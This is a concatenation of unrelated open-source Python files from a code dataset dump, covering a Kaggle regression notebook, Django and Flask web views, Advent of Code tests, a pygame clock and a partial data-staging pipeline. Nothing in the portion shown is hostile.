axes.flatten()\n for i, xi in enumerate(x): sns.scatterplot(x=xi, y=y, data=data, ax=axes[i])\n\n# In[ ]:\n\n\n# describe training and testing data\ndf_data.describe(include='all')\n\n# In[ ]:\n\n\n# convert dtypes numeric to object\ncol_convert = ['target']\ndf_data[col_convert] = df_data[col_convert].astype('object')\n\n# In[ ]:\n\n\n# list all features type number\ncol_number = df_data.select_dtypes(include=['number']).columns.tolist()\nprint('features type number:\\n items %s\\n length %d' %(col_number, len(col_number)))\n\n# list all features type object\ncol_object = df_data.select_dtypes(include=['object']).columns.tolist()\nprint('features type object:\\n items %s\\n length %d' %(col_object, len(col_object)))\n\n# In[ ]:\n\n\n# feature exploration: histogram of all numeric features\n_ = df_data.hist(bins=20, figsize=(200, 150))\n\n# After extracting all features, it is required to convert category features to numerics features, a format suitable to feed into our Machine Learning models.\n\n# In[ ]:\n\n\n# feature extraction: target\ndf_data['target'] = df_data['target'].fillna(-1)\n\n# In[ ]:\n\n\n# convert category codes for data dataframe\ndf_data = pd.get_dummies(df_data, columns=['datatype'], drop_first=True)\n\n# In[ ]:\n\n\n# convert dtypes object to numeric for data dataframe\ncol_convert = ['target']\ndf_data[col_convert] = df_data[col_convert].astype(int)\n\n# In[ ]:\n\n\n# describe data dataframe\ndf_data.describe(include='all')\n\n# In[ ]:\n\n\n# verify dtypes object\ndf_data.info()\n\n# > **Analyze and identify patterns by visualizations**\n# \n# Let us generate some correlation plots of the features to see how related one feature is to the next. To do so, we will utilize the Seaborn plotting package which allows us to plot very conveniently as follows.\n# \n# The Pearson Correlation plot can tell us the correlation between features with one another. If there is no strongly correlated between features, this means that there isn't much redundant or superfluous data in our training data. This plot is also useful to determine which features are correlated to the observed value.\n# \n# The pairplots is also useful to observe the distribution of the training data from one feature to the other.\n# \n# The pivot table is also another useful method to observe the impact between features.\n\n# > **Model, predict and solve the problem**\n# \n# Now, it is time to feed the features to Machine Learning models.\n\n# In[ ]:\n\n\n# select all features to evaluate the feature importances\nx = df_data[df_data['datatype_training'] == 1].drop(['id', 'target', 'datatype_training'], axis=1)\ny = df_data.loc[df_data['datatype_training'] == 1, 'target']\n\n# In[ ]:\n\n\n# set up lasso regression to find the feature importances\nlassoreg = Lasso(alpha=1e-5).fit(x, y)\nfeat = pd.DataFrame(data=lassoreg.coef_, index=x.columns, columns=['feature_importances']).sort_values(['feature_importances'], ascending=False)\n\n# In[ ]:\n\n\n# plot the feature importances\nfeat[(feat['feature_importances'] < -1e-3) | (feat['feature_importances'] > 1e-3)].dropna().plot(y='feature_importances', figsize=(20, 5), kind='bar')\nplt.axhline(-0.05, color=\"grey\")\nplt.axhline(0.05, color=\"grey\")\n\n# In[ ]:\n\n\n# list feature importances\nmodel_feat = feat[(feat['feature_importances'] < -0.05) | (feat['feature_importances'] > 0.05)].index\n\n# In[ ]:\n\n\n# select the important features\nx = df_data.loc[df_data['datatype_training'] == 1, model_feat]\ny = df_data.loc[df_data['datatype_training'] == 1, 'target']\n\n# In[ ]:\n\n\n# create scaler to the features\nscaler = RobustScaler()\nx = scaler.fit_transform(x)\n\n# In[ ]:\n\n\n# perform train-test (validate) split\nx_train, x_validate, y_train, y_validate = train_test_split(x, y, random_state=58, test_size=0.25)\n\n# In[ ]:\n\n\n# linear regression model setup\nmodel_linreg = LinearRegression()\n\n# linear regression model fit\nmodel_linreg.fit(x_train, y_train)\n\n# linear regression model prediction\nmodel_linreg_ypredict = model_linreg.predict(x_validate)\n\n# linear regression model metrics\nmodel_linreg_rocaucscore = roc_auc_score(y_validate, model_linreg_ypredict)\nmodel_linreg_cvscores = cross_val_score(model_linreg, x, y, cv=20, scoring='roc_auc')\nprint('linear regression\\n roc auc score: %0.4f, cross validation score: %0.4f (+/- %0.4f)' %(model_linreg_rocaucscore, model_linreg_cvscores.mean(), 2 * model_linreg_cvscores.std()))\n\n# With linear regression submission, the LB score is 0.629. It's seem overfitting.\n\n# In[ ]:\n\n\n# lasso regression model setup\nmodel_lassoreg = Lasso(alpha=0.01)\n\n# lasso regression model fit\nmodel_lassoreg.fit(x_train, y_train)\n\n# lasso regression model prediction\nmodel_lassoreg_ypredict = model_lassoreg.predict(x_validate)\n\n# lasso regression model metrics\nmodel_lassoreg_rocaucscore = roc_auc_score(y_validate, model_lassoreg_ypredict)\nmodel_lassoreg_cvscores = cross_val_score(model_lassoreg, x, y, cv=20, scoring='roc_auc')\nprint('lasso regression\\n roc auc score: %0.4f, cross validation score: %0.4f (+/- %0.4f)' %(model_lassoreg_rocaucscore, model_lassoreg_cvscores.mean(), 2 * model_lassoreg_cvscores.std()))\n\n# In[ ]:\n\n\n# specify the hyperparameter space\nparams = {\n 'alpha': np.logspace(-4, -2, base=10, num=50),\n}\n\n# lasso regression grid search model setup\nmodel_lassoreg_cv = GridSearchCV(model_lassoreg, params, iid=False, cv=5)\n\n# lasso regression grid search model fit\nmodel_lassoreg_cv.fit(x_train, y_train)\n\n# lasso regression grid search model prediction\nmodel_lassoreg_cv_ypredict = model_lassoreg_cv.predict(x_validate)\n\n# lasso regression grid search model metrics\nmodel_lassoreg_cv_rocaucscore = roc_auc_score(y_validate, model_lassoreg_cv_ypredict)\nmodel_lassoreg_cv_cvscores = cross_val_score(model_lassoreg_cv, x, y, cv=20, scoring='roc_auc')\nprint('lasso regression grid search\\n roc auc score: %0.4f, cross validation score: %0.4f (+/- %0.4f)' %(model_lassoreg_cv_rocaucscore, model_lassoreg_cv_cvscores.mean(), 2 * model_lassoreg_cv_cvscores.std()))\nprint(' best parameters: %s' %model_lassoreg_cv.best_params_)\n\n# With lasso regression submission, the LB score is 0.704. It's seem overfitting.\n\n# In[ ]:\n\n\n# ridge regression model setup\nmodel_ridgereg = Ridge(alpha=35)\n\n# ridge regression model fit\nmodel_ridgereg.fit(x_train, y_train)\n\n# ridge regression model prediction\nmodel_ridgereg_ypredict = model_ridgereg.predict(x_validate)\n\n# ridge regression model metrics\nmodel_ridgereg_rocaucscore = roc_auc_score(y_validate, model_ridgereg_ypredict)\nmodel_ridgereg_cvscores = cross_val_score(model_ridgereg, x, y, cv=20, scoring='roc_auc')\nprint('ridge regression\\n roc auc score: %0.4f, cross validation score: %0.4f (+/- %0.4f)' %(model_ridgereg_rocaucscore, model_ridgereg_cvscores.mean(), 2 * model_ridgereg_cvscores.std()))\n\n# In[ ]:\n\n\n# specify the hyperparameter space\nparams = {'alpha': np.logspace(-4, 4, base=10, num=50)}\n\n# ridge regression grid search model setup\nmodel_ridgereg_cv = GridSearchCV(model_ridgereg, params, iid=False, cv=5)\n\n# ridge regression grid search model fit\nmodel_ridgereg_cv.fit(x_train, y_train)\n\n# ridge regression grid search model prediction\nmodel_ridgereg_cv_ypredict = model_ridgereg_cv.predict(x_validate)\n\n# ridge regression grid search model metrics\nmodel_ridgereg_cv_rocaucscore = roc_auc_score(y_validate, model_ridgereg_cv_ypredict)\nmodel_ridgereg_cv_cvscores = cross_val_score(model_ridgereg_cv, x, y, cv=20, scoring='roc_auc')\nprint('ridge regression grid search\\n roc auc score: %0.4f, cross validation score: %0.4f (+/- %0.4f)' %(model_ridgereg_cv_rocaucscore, model_ridgereg_cv_cvscores.mean(), 2 * model_ridgereg_cv_cvscores.std()))\nprint(' best parameters: %s' %model_ridgereg_cv.best_params_)\n\n# With ridge regression submission, the LB score is 0.690. It's seem overfitting.\n\n# In[ ]:\n\n\n# elastic net regression model setup\nmodel_elasticnetreg = ElasticNet(alpha=0.01, l1_ratio=0.9)\n\n# elastic net regression model fit\nmodel_elasticnetreg.fit(x_train, y_train)\n\n# elastic net regression model prediction\nmodel_elasticnetreg_ypredict = model_elasticnetreg.predict(x_validate)\n\n# elastic net regression model metrics\nmodel_elasticnetreg_rocaucscore = roc_auc_score(y_validate, model_elasticnetreg_ypredict)\nmodel_elasticnetreg_cvscores = cross_val_score(model_elasticnetreg, x, y, cv=20, scoring='roc_auc')\nprint('elastic net regression\\n roc auc score: %0.4f, cross validation score: %0.4f (+/- %0.4f)' %(model_elasticnetreg_rocaucscore, model_elasticnetreg_cvscores.mean(), 2 * model_elasticnetreg_cvscores.std()))\n\n# In[ ]:\n\n\n# specify the hyperparameter space\nparams = {'alpha': np.logspace(-4, -2, base=10, num=10),\n 'l1_ratio': np.linspace(0.1, 0.9, num=5),\n}\n\n# elastic net regression grid search model setup\nmodel_elasticnetreg_cv = GridSearchCV(model_elasticnetreg, params, iid=False, cv=5)\n\n# elastic net regression grid search model fit\nmodel_elasticnetreg_cv.fit(x_train, y_train)\n\n# elastic net regression grid search model prediction\nmodel_elasticnetreg_cv_ypredict = model_elasticnetreg_cv.predict(x_validate)\n\n# elastic net regression grid search model metrics\nmodel_elasticnetreg_cv_rocaucscore = roc_auc_score(y_validate, model_elasticnetreg_cv_ypredict)\nmodel_elasticnetreg_cv_cvscores = cross_val_score(model_elasticnetreg_cv, x, y, cv=20, scoring='roc_auc')\nprint('elastic net regression grid search\\n roc auc score: %0.4f, cross validation score: %0.4f (+/- %0.4f)' %(model_elasticnetreg_cv_rocaucscore, model_elasticnetreg_cv_cvscores.mean(), 2 * model_elasticnetreg_cv_cvscores.std()))\nprint(' best parameters: %s' %model_elasticnetreg_cv.best_params_)\n\n# In[ ]:\n\n\n# kernel ridge regression model setup\nmodel_kernelridgereg = KernelRidge(alpha=0.0001, degree=4, kernel='polynomial')\n\n# kernel ridge regression model fit\nmodel_kernelridgereg.fit(x_train, y_train)\n\n# kernel ridge regression model prediction\nmodel_kernelridgereg_ypredict = model_kernelridgereg.predict(x_validate)\n\n# kernel ridge regression model metrics\nmodel_kernelridgereg_rocaucscore = roc_auc_score(y_validate, model_kernelridgereg_ypredict)\nmodel_kernelridgereg_cvscores = cross_val_score(model_kernelridgereg, x, y, cv=20, scoring='roc_auc')\nprint('kernel ridge regression\\n roc auc score: %0.4f, cross validation score: %0.4f (+/- %0.4f)' %(model_kernelridgereg_rocaucscore, model_kernelridgereg_cvscores.mean(), 2 * model_kernelridgereg_cvscores.std()))\n\n# In[ ]:\n\n\n# specify the hyperparameter space\nparams = {'alpha': np.logspace(-4, -2, base=10, num=10),\n 'degree': [1, 2, 3, 4, 5],\n}\n\n# kernel ridge regression grid search model setup\nmodel_kernelridgereg_cv = GridSearchCV(model_kernelridgereg, params, iid=False, cv=5)\n\n# kernel ridge regression grid search model fit\nmodel_kernelridgereg_cv.fit(x_train, y_train)\n\n# kernel ridge regression grid search model prediction\nmodel_kernelridgereg_cv_ypredict = model_kernelridgereg_cv.predict(x_validate)\n\n# kernel ridge regression grid search model metrics\nmodel_kernelridgereg_cv_rocaucscore = roc_auc_score(y_validate, model_kernelridgereg_cv_ypredict)\nmodel_kernelridgereg_cv_cvscores = cross_val_score(model_kernelridgereg_cv, x, y, cv=20, scoring='roc_auc')\nprint('kernel ridge regression grid search\\n roc auc score: %0.4f, cross validation score: %0.4f (+/- %0.4f)' %(model_kernelridgereg_cv_rocaucscore, model_kernelridgereg_cv_cvscores.mean(), 2 * model_kernelridgereg_cv_cvscores.std()))\nprint(' best parameters: %s' %model_kernelridgereg_cv.best_params_)\n\n# In[ ]:\n\n\n# decision tree regression model setup\nmodel_treereg = DecisionTreeRegressor(splitter='best', min_samples_split=5)\n\n# decision tree regression model fit\nmodel_treereg.fit(x_train, y_train)\n\n# decision tree regression model prediction\nmodel_treereg_ypredict = model_treereg.predict(x_validate)\n\n# decision tree regression model metrics\nmodel_treereg_rocaucscore = roc_auc_score(y_validate, model_treereg_ypredict)\nmodel_treereg_cvscores = cross_val_score(model_treereg, x, y, cv=20, scoring='roc_auc')\nprint('decision tree regression\\n roc auc score: %0.4f, cross validation score: %0.4f (+/- %0.4f)' %(model_treereg_rocaucscore, model_treereg_cvscores.mean(), 2 * model_treereg_cvscores.std()))\n\n# In[ ]:\n\n\n# random forest regression model setup\nmodel_forestreg = RandomForestRegressor(n_estimators=100, min_samples_split=3, random_state=58)\n\n# random forest regression model fit\nmodel_forestreg.fit(x_train, y_train)\n\n# random forest regression model prediction\nmodel_forestreg_ypredict = model_forestreg.predict(x_validate)\n\n# random forest regression model metrics\nmodel_forestreg_rocaucscore = roc_auc_score(y_validate, model_forestreg_ypredict)\nmodel_forestreg_cvscores = cross_val_score(model_forestreg, x, y, cv=20, scoring='roc_auc')\nprint('random forest regression\\n roc auc score: %0.4f, cross validation score: %0.4f (+/- %0.4f)' %(model_forestreg_rocaucscore, model_forestreg_cvscores.mean(), 2 * model_forestreg_cvscores.std()))\n\n# In[ ]:\n\n\n# stan model setup\nmodel_code = \"\"\"\n data {\n int N; // the number of training data\n int N2; // the number of testing data\n int K; // the number of features\n int y[N]; // the response variable\n matrix[N,K] X; // the training matrix\n matrix[N2,K] X_test; // the testing matrix\n }\n parameters {\n vector[K] alpha;\n real beta;\n }\n transformed parameters {\n vector[N] y_linear;\n y_linear = beta + X * alpha;\n }\n model {\n alpha ~ cauchy(0, 10); // cauchy distribution\n for (i in 1:K)\n alpha[i] ~ student_t(1, 0, 0.03); // student t distribution\n y ~ bernoulli_logit(y_linear); // bernoulli distribution, logit parameterization\n }\n generated quantities {\n vector[N2] y_pred;\n y_pred = beta + X_test * alpha;\n }\n\"\"\"\n\nmodel_data = {\n 'N': 250,\n 'N2': 19750,\n 'K': 300,\n 'y': df_data.loc[df_data['datatype_training'] == 1, 'target'],\n 'X': df_data[df_data['datatype_training'] == 1].drop(['id', 'target', 'datatype_training'], axis=1),\n 'X_test': df_data[df_data['datatype_training'] == 0].drop(['id', 'target', 'datatype_training'], axis=1),\n}\n\nmodel_stan = pystan.StanModel(model_code=model_code)\n\n# stan model fit\nmodel_stan_fitted = model_stan.sampling(data=model_data, seed=58)\n\n# With pystan bernoulli distribution, logit parameterization submission, the LB score is 0.859.\n\n# > **Supply or submit the results**\n# \n# Our submission to the competition site Kaggle is ready. Any suggestions to improve our score are welcome.\n\n# In[ ]:\n\n\n# prepare testing data and compute the observed value\nx_test = df_data[df_data['datatype_training'] == 0]\ny_test = pd.DataFrame(np.mean(model_stan_fitted.extract(permuted=True)['y_pred'], axis=0),\n columns=['target'], index=df_data.loc[df_data['datatype_training'] == 0, 'id'])\n\n# In[ ]:\n\n\n# summit the results\nout = pd.DataFrame({'id': y_test.index, 'target': y_test['target']})\nout.to_csv('submission.csv', index=False)\n\n# In[ ]:\n\n\n\n","repo_name":"tetherless-world/CodeGraph","sub_path":"kaggle/python_files/sample552.py","file_name":"sample552.py","file_ext":"py","file_size_in_byte":20008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70234940648","text":"from django import template\nfrom django.urls import reverse\n\nfrom cciw.bookings.views import BookingStage\n\nregister = template.Library()\n\n\n@register.inclusion_tag(\"cciw/bookings/bookingbar.html\", takes_context=True)\ndef bookingbar(context):\n request = context[\"request\"]\n booking_account = request.booking_account\n logged_in = booking_account is not None\n current_stage = context[\"stage\"]\n has_account_details = logged_in and request.booking_account.has_account_details()\n\n # Tuple of (name, caption, if this a link, url, message if inaccessible):\n msg_need_login = \"Must be logged in to access this\"\n msg_need_account_details = (\n \"Need account details to access this\" if logged_in else \"Must be logged in to access this\"\n )\n stages = [\n (\n BookingStage.LOGIN,\n \"Log in\",\n False,\n \"\",\n 'Go to \"Overview\" and use the \"log out\" link if you need to log in as someone else',\n ),\n (\n BookingStage.ACCOUNT,\n \"Account details\",\n logged_in,\n reverse(\"cciw-bookings-account_details\"),\n msg_need_login,\n ),\n (\n BookingStage.OVERVIEW,\n \"Overview\",\n logged_in,\n reverse(\"cciw-bookings-account_overview\"),\n msg_need_login,\n ),\n (\n BookingStage.PLACE,\n \"Edit camper details\"\n if current_stage == BookingStage.PLACE and \"edit_mode\" in context\n else \"Add new booking\",\n logged_in and has_account_details,\n reverse(\"cciw-bookings-add_place\"),\n msg_need_account_details,\n ),\n (\n BookingStage.LIST,\n \"Checkout\",\n logged_in and has_account_details,\n reverse(\"cciw-bookings-list_bookings\"),\n msg_need_account_details,\n ),\n (\n BookingStage.PAY,\n \"Pay\",\n logged_in and has_account_details,\n reverse(\"cciw-bookings-pay\"),\n msg_need_account_details,\n ),\n ]\n return {\n \"logged_in\": logged_in,\n \"request\": request,\n \"stages\": stages,\n \"current_stage\": current_stage,\n }\n","repo_name":"cciw-uk/cciw.co.uk","sub_path":"cciw/bookings/templatetags/bookings.py","file_name":"bookings.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"25562546732","text":"from datetime import datetime\nimport os\nfrom flask import jsonify, current_app, request, session, send_from_directory\nfrom helpers import upload_files\n\n\nclass FileUploadController:\n def __init__(self):\n pass\n\n def upload_avatar(self):\n \"\"\"FileUpload\"\"\"\n \n if request.method == \"POST\" and session.get(\"user_id\"):\n user_folder_name = str(session.get(\"user_id\")) + \"\\\\avatar\"\n file_name = str(session.get(\"user_id\")) + '_' + str(datetime.now().timestamp()).replace(\".\", \"\")\n\n try:\n\n result = upload_files(\n file=request.files[\"file\"],\n user_folder_name=user_folder_name,\n file_name=file_name,\n upload_extensions=current_app.config[\"UPLOAD_EXTENSIONS\"],\n upload_path=current_app.config[\"UPLOAD_PATH\"],\n # for now it should be 1 avatar file, so we overwrite if exists\n cb=self.remove_old\n )\n\n except OSError as er:\n print(\"An exception occurred\", er)\n return er, 500\n\n print(\"result:\", result)\n\n # set in session\n session[\"user_avatar\"] = result[\"path\"][\"filename\"] if type(result) == dict and \"ok\" in result.keys() else session.get(\"user_avatar\")\n session.modified = True\n\n # er format\n if type(result) == tuple:\n return result\n\n return jsonify(result)\n\n return \"Invalid Method\", 400\n # return render_template(\"profile.html\", change_password_form=self.get_reset_form())\n\n\n def get_avatar(self, filename):\n dir = os.path.join(current_app.config[\"UPLOAD_PATH\"], str(session.get(\"user_id\")) + \"\\\\avatar\")\n file = os.path.join(dir, filename)\n file_exists = os.path.exists(file)\n if not file_exists:\n return \"\"\n return send_from_directory(dir, filename)\n\n\n def remove_old(self, user_folder_name):\n \"\"\"remove old file\n\n Args:\n user_folder_name (path): user folder path\n\n Returns:\n tuple: ok tuple | er tuple\n \"\"\"\n try:\n path = os.path.join(\n current_app.config[\"UPLOAD_PATH\"],\n user_folder_name,\n )\n dir_exists = os.path.exists(path)\n # print(\"path: \", path, \"dir_exists: \", dir_exists)\n if not dir_exists:\n os.makedirs(path)\n\n old = os.listdir(path)[0] if os.listdir(path) else \"\"\n # print(\"old: \", old)\n file_exists = os.path.exists(os.path.join(path, old))\n\n if file_exists:\n os.remove(os.path.join(path, old))\n # print(\"rm: \", os.path.join(path, old))\n\n return \"ok\", 204\n \n except OSError as er:\n print('An exception occurred', er)\n return er, 500","repo_name":"AH-SALAH/CS50X","sub_path":"week-9/pSet-9/finance/controllers/fileuploadctrl.py","file_name":"fileuploadctrl.py","file_ext":"py","file_size_in_byte":2952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3129714060","text":"from pytest import fixture, mark\r\nfrom src.day_9 import count_tail_squares, move_head, move_tail, count_last_knot_squares\r\n\r\n\r\n@fixture()\r\ndef head_data():\r\n return \"\"\"R 4\r\nU 4\r\nL 3\r\nD 1\r\nR 4\r\nD 1\r\nL 5\r\nR 2\"\"\".splitlines()\r\n\r\n\r\n@mark.parametrize(\"x, y, direction, spaces, result\", (\r\n (0, 0, \"L\", \"2\", (-2, 0)),\r\n (0, 0, \"R\", \"2\", (2, 0)),\r\n (0, 0, \"U\", \"2\", (0, 2)),\r\n (0, 0, \"D\", \"2\", (0, -2)),\r\n))\r\ndef test_move_head(x, y, direction, spaces, result):\r\n assert move_head(x, y, direction, int(spaces)) == result\r\n\r\n\r\n@mark.parametrize(\"head_x, head_y, tail_x, tail_y, result\", (\r\n (-2, 0, 0, 0, (-1, 0)),\r\n (2, 0, 0, 0, (1, 0)),\r\n (0, 2, 0, 0, (0, 1)),\r\n (0, -2, 0, 0, (0, -1)),\r\n (2, 4, 4, 3, (3, 4))\r\n))\r\ndef test_move_tail(head_x, head_y, tail_x, tail_y, result):\r\n assert move_tail(head_x, head_y, tail_x, tail_y) == result\r\n\r\n\r\ndef test_count_tail_squares(head_data):\r\n assert count_tail_squares(head_data) == 13\r\n\r\n\r\ndef test_last_knot_squares(head_data):\r\n assert count_last_knot_squares(head_data) == 1\r\n\r\n\r\ndef test_last_knot_squares_additional_motion():\r\n assert count_last_knot_squares(\"\"\"R 5\r\nU 8\r\nL 8\r\nD 3\r\nR 17\r\nD 10\r\nL 25\r\nU 20\"\"\".splitlines()) == 36\r\n","repo_name":"cdsre/advent_of_code_2022","sub_path":"test/test_day_9.py","file_name":"test_day_9.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6382706892","text":"import pandas as pd\n\n\ndef find_incorrect_values(df):\n incorrect_positions = []\n column_types = {\n 'Fecha': 'Timestamp',\n 'Monto': 'float',\n 'Cliente': 'str', \n 'Proveedor': 'str'\n }\n for index, row in df.iterrows():\n for column, expected_data_type in column_types.items():\n value = row[column]\n actual_data_type = type(value).__name__\n\n if actual_data_type != expected_data_type:\n incorrect_positions.append((column, index+2))\n\n return incorrect_positions","repo_name":"RafaelUV18/payments_project","sub_path":"functions/dataframes.py","file_name":"dataframes.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12958390326","text":"# Leer archivo JSON\n# JSON = JavaScript Object Notation\nimport json\nimport urllib.request\n\nrespuesta = urllib.request.urlopen('https://jsonplaceholder.typicode.com/todos')\nprint(respuesta)\ncuerpo_respuesta = respuesta.read()\nprint(cuerpo_respuesta)\n\n# Procesamos la respuesta\n\njson_respuesta = json.loads(cuerpo_respuesta.decode('utf-8'))\nprint(json_respuesta)\n\n# Imprimir solo los nombres de las personas\n# JSON se convierte a listas y diccionarios en python\nfor objeto in json_respuesta:\n print(f'Data: [UserID:{objeto[\"userId\"]}]')","repo_name":"alfredohugueth/Curso_universidad_python","sub_path":"CreacionCapaDatosPython/json_python.py","file_name":"json_python.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40390803200","text":"from django.shortcuts import render, HttpResponse\nfrom datetime import datetime\nfrom home.models import contact\nfrom django.contrib import messages\nfrom django.core.mail import send_mail\n\n# Create your views here.\ndef index(request):\n return render(request, 'home.html')\n\ndef about(request):\n return render(request, 'about.html')\n\ndef services(request):\n return render(request, 'service.html')\n\ndef mailsender(request):\n if request.method == \"POST\":\n sub = request.POST.get('subject')\n \n msg = request.POST.get('message')\n print(sub,msg)\n \n send_mail(\n sub,msg,'mtest01311@gmail.com',\n ['rohan.inamdar222@gmail.com','kavin.sundarr@gmail.com']\n )\n HttpResponse(\" Mail Sent !\")\n messages.success(request, 'Your message has been sent!')\n return render(request,'mailsender.html')\n \n\ndef contact(request):\n if request.method == \"POST\":\n name = request.POST.get('name')\n email = request.POST.get('email')\n phone = request.POST.get('phone')\n desc = request.POST.get('desc')\n date = datetime.today()\n Contact = contact(name=name, email=email, phone=phone, desc=desc, date = date)\n\n Contact.save()\n #messages.success(request, 'Your message has been sent!')\n return render(request, 'contact.html')\n","repo_name":"irohan0/icecream","sub_path":"icecream/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14348856748","text":"from datetime import datetime as dt\n\nimport pygame\n\npygame.init()\nrun = True\nclock = pygame.time.Clock()\n\nbody = pygame.image.load(\"images/main-clock.png\")\nleft_hand = pygame.image.load(\"images/left-hand.png\")\nright_hand = pygame.image.load(\"images/right-hand.png\")\n\nscreen = pygame.display.set_mode((body.get_width(), body.get_height()))\n\n\n# minutes\nleft_hand_angle = dt.now().minute * 6 - 90\n# hours\nright_hand_angle = dt.now().hour % 12 * 30 + dt.now().minute / 60 * 30 - 90\n\n\nwhile run:\n clock.tick(1)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\n right_hand_rotated = pygame.transform.rotate(right_hand, -right_hand_angle)\n right_hand_x = body.get_width() / 2 - right_hand_rotated.get_width() / 2\n right_hand_y = body.get_height() / 2 - right_hand_rotated.get_height() / 2\n left_hand_rotated = pygame.transform.rotate(left_hand, -left_hand_angle)\n left_hand_x = body.get_width() / 2 - left_hand_rotated.get_width() / 2\n left_hand_y = body.get_height() / 2 - left_hand_rotated.get_height() / 2\n\n screen.fill(\"black\")\n screen.blit(body, (0, 0))\n screen.blit(right_hand_rotated, (right_hand_x, right_hand_y))\n screen.blit(left_hand_rotated, (left_hand_x, left_hand_y))\n\n if dt.now().second == 0:\n left_hand_angle += 6\n right_hand_angle += 0.25\n\n pygame.display.flip()\n","repo_name":"Lagman54/pp2-22B030553","sub_path":"TSIS7/task1/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20442271611","text":"import glob\nimport shutil\nimport time\nfrom abc import ABC, abstractclassmethod, abstractmethod\nfrom enum import Enum\nfrom multiprocessing import Process, current_process\nfrom multiprocessing import Queue as mp_queue\nfrom pathlib import Path\nfrom queue import Queue as ser_queue\nfrom threading import Thread\nfrom typing import Callable, List, Tuple\nimport struct\nimport signal\n\nimport numpy as np\n\nfrom ams.config import AMSInstance\nfrom ams.faccessors import get_reader, get_writer\nfrom ams.store import AMSDataStore\nfrom ams.util import get_unique_fn\nfrom ams.rmq_async import RMQConsumer\n\nBATCH_SIZE = 32 * 1024 * 1024\n\n\nclass MessageType(Enum):\n Process = 1\n NewModel = 2\n Terminate = 3\n\n\nclass DataBlob:\n \"\"\"\n Class wrapping input, outputs in a single class\n\n Attributes:\n inputs: A ndarray of the inputs.\n outputs: A ndarray of the outputs.\n \"\"\"\n\n def __init__(self, inputs, outputs):\n self._inputs = inputs\n self._outputs = outputs\n\n @property\n def inputs(self):\n return self._inputs\n\n @property\n def outputs(self):\n return self._outputs\n\n\nclass QueueMessage:\n \"\"\"\n A message in the IPC Queues.\n\n Attributes:\n msg_type: The type of the message. We currently support 3 types Process, NewModel, Terminate\n blob: The contents of the message\n \"\"\"\n\n def __init__(self, msg_type, blob):\n if not isinstance(msg_type, MessageType):\n raise TypeError(\"Message Type should be of type MessageType\")\n self.msg_type = msg_type\n self.blob = blob\n\n def is_terminate(self):\n return self.msg_type == MessageType.Terminate\n\n def is_process(self):\n return self.msg_type == MessageType.Process\n\n def is_new_model(self):\n return self.msg_type == MessageType.NewModel\n\n def data(self):\n return self.blob\n\n\nclass Task(ABC):\n \"\"\"\n An abstract interface encapsulating a\n callable mechanism to be performed during\n the staging mechanism.\n \"\"\"\n\n @abstractmethod\n def __call__(self):\n pass\n\n\nclass ForwardTask(Task):\n \"\"\"\n A ForwardTask reads messages from some input queues performs some\n action/transformation and forwards the outcome to some output queue.\n\n Attributes:\n i_queue: The input queue to read input message\n o_queue: The output queue to write the transformed messages\n callback: A callback to be applied on every message before pushing it to the next stage.\n \"\"\"\n\n def __init__(self, i_queue, o_queue, callback):\n \"\"\"\n initializes a ForwardTask class with the queues and the callback.\n \"\"\"\n\n if not isinstance(callback, Callable):\n raise TypeError(f\"{callback} argument is not Callable\")\n\n self.i_queue = i_queue\n self.o_queue = o_queue\n self.callback = callback\n\n def _action(self, data):\n \"\"\"\n Apply an 'action' to the incoming data\n\n Args:\n data: A DataBlob of inputs, outputs to be transformed\n\n Returns:\n A pair of inputs, outputs of the data after the transformation\n \"\"\"\n inputs, outputs = self.callback(data.inputs, data.outputs)\n # This can be too conservative, we may want to relax it later\n if not (isinstance(inputs, np.ndarray) and isinstance(outputs, np.ndarray)):\n raise TypeError(f\"{self.callback.__name__} did not return numpy arrays\")\n return inputs, outputs\n\n def __call__(self):\n \"\"\"\n A busy loop reading messages from the i_queue, acting on those messages and forwarding\n the output to the output queue. In the case of receiving a 'termination' messages informs\n the tasks waiting on the output queues about the terminations and returns from the function.\n \"\"\"\n\n while True:\n # This is a blocking call\n item = self.i_queue.get(block=True)\n if item.is_terminate():\n self.o_queue.put(QueueMessage(MessageType.Terminate, None))\n break\n elif item.is_process():\n inputs, outputs = self._action(item.data())\n self.o_queue.put(QueueMessage(MessageType.Process, DataBlob(inputs, outputs)))\n elif item.is_new_model():\n # This is not handled yet\n continue\n return\n\n\nclass FSLoaderTask(Task):\n \"\"\"\n A FSLoaderTask reads files from the filesystem bundles the data of\n the files into batches and forwards them to the next task waiting on the\n output queuee.\n\n Attributes:\n o_queue: The output queue to write the transformed messages\n loader: A child class inheriting from FileReader that loads data from the filesystem.\n pattern: The (glob-)pattern of the files to be read.\n \"\"\"\n\n def __init__(self, o_queue, loader, pattern):\n self.o_queue = o_queue\n self.pattern = pattern\n self.loader = loader\n\n def __call__(self):\n \"\"\"\n Busy loop of reading all files matching the pattern and creating\n '100' batches which will be pushed on the queue. Upon reading all files\n the Task pushes a 'Terminate' message to the queue and returns.\n \"\"\"\n\n start = time.time()\n for fn in glob.glob(self.pattern):\n with self.loader(fn) as fd:\n input_data, output_data = fd.load()\n row_size = input_data[0, :].nbytes + output_data[0, :].nbytes\n rows_per_batch = int(np.ceil(BATCH_SIZE / row_size))\n num_batches = int(np.ceil(input_data.shape[0] / rows_per_batch))\n input_batches = np.array_split(input_data, num_batches)\n output_batches = np.array_split(output_data, num_batches)\n for j, (i, o) in enumerate(zip(input_batches, output_batches)):\n 